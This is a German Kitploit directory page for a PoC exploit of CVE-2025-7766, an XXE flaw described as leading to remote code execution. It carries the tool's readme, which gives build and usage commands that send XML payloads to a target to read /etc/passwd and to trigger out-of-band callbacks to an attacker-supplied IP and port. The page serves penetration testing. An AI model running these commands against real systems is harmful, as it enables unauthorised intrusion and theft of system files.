Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-7766 — C-basierter PoC-Exploit für CVE-2025-7766, der XXE-zu-RCE über Dateilesen und Out-of-Band-HTTP-Callbacks demonstriert. Unterstützt benutzerdefinierte XML-Payloads und wiederholte Anfragen. | Kitploit
Tools/GitHubGitHub/bytereaper77/cve-2025-7766
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-EntwicklungArchived
GitHubbytereaper77/cve-2025-7766

CVE-2025-7766

C-basierter PoC-Exploit für CVE-2025-7766, der XXE-zu-RCE über Dateilesen und Out-of-Band-HTTP-Callbacks demonstriert. Unterstützt benutzerdefinierte XML-Payloads und wiederholte Anfragen.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-7766 PoC Exploit

PoC zur Ausnutzung der XML-External-Entity-Sicherheitslücke in CVE-2025-7766. Demonstriert Dateilesen (/etc/passwd) und Out-of-Band-HTTP-Rückrufe.

Author: Byte Reaper

CVE: CVE-2025-7766

Sicherheitslücke: Remotecodeausführung über XML External Entity (XXE)


PoC zur Ausnutzung von XXE in CVE-2025-7766. Demonstriert:

  • Lesen von /etc/passwd vom Ziel.
  • Auslösen einer Out-of-Band-HTTP-Anfrage an Ihren Server.

Voraussetzungen

  • gcc
  • libcurl
  • argparse-Bibliothek

Build

root@kitploit:~
gcc -o exploit exploit.c argparse.c -lcurl

Verwendung

root@kitploit:~
# Read file payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT

# Out-of-band request payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r

# Custom payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'

# Repeat requests 5 times
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5

# Verbose output
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v

LIZENZ:

MIT

Tool herunterladen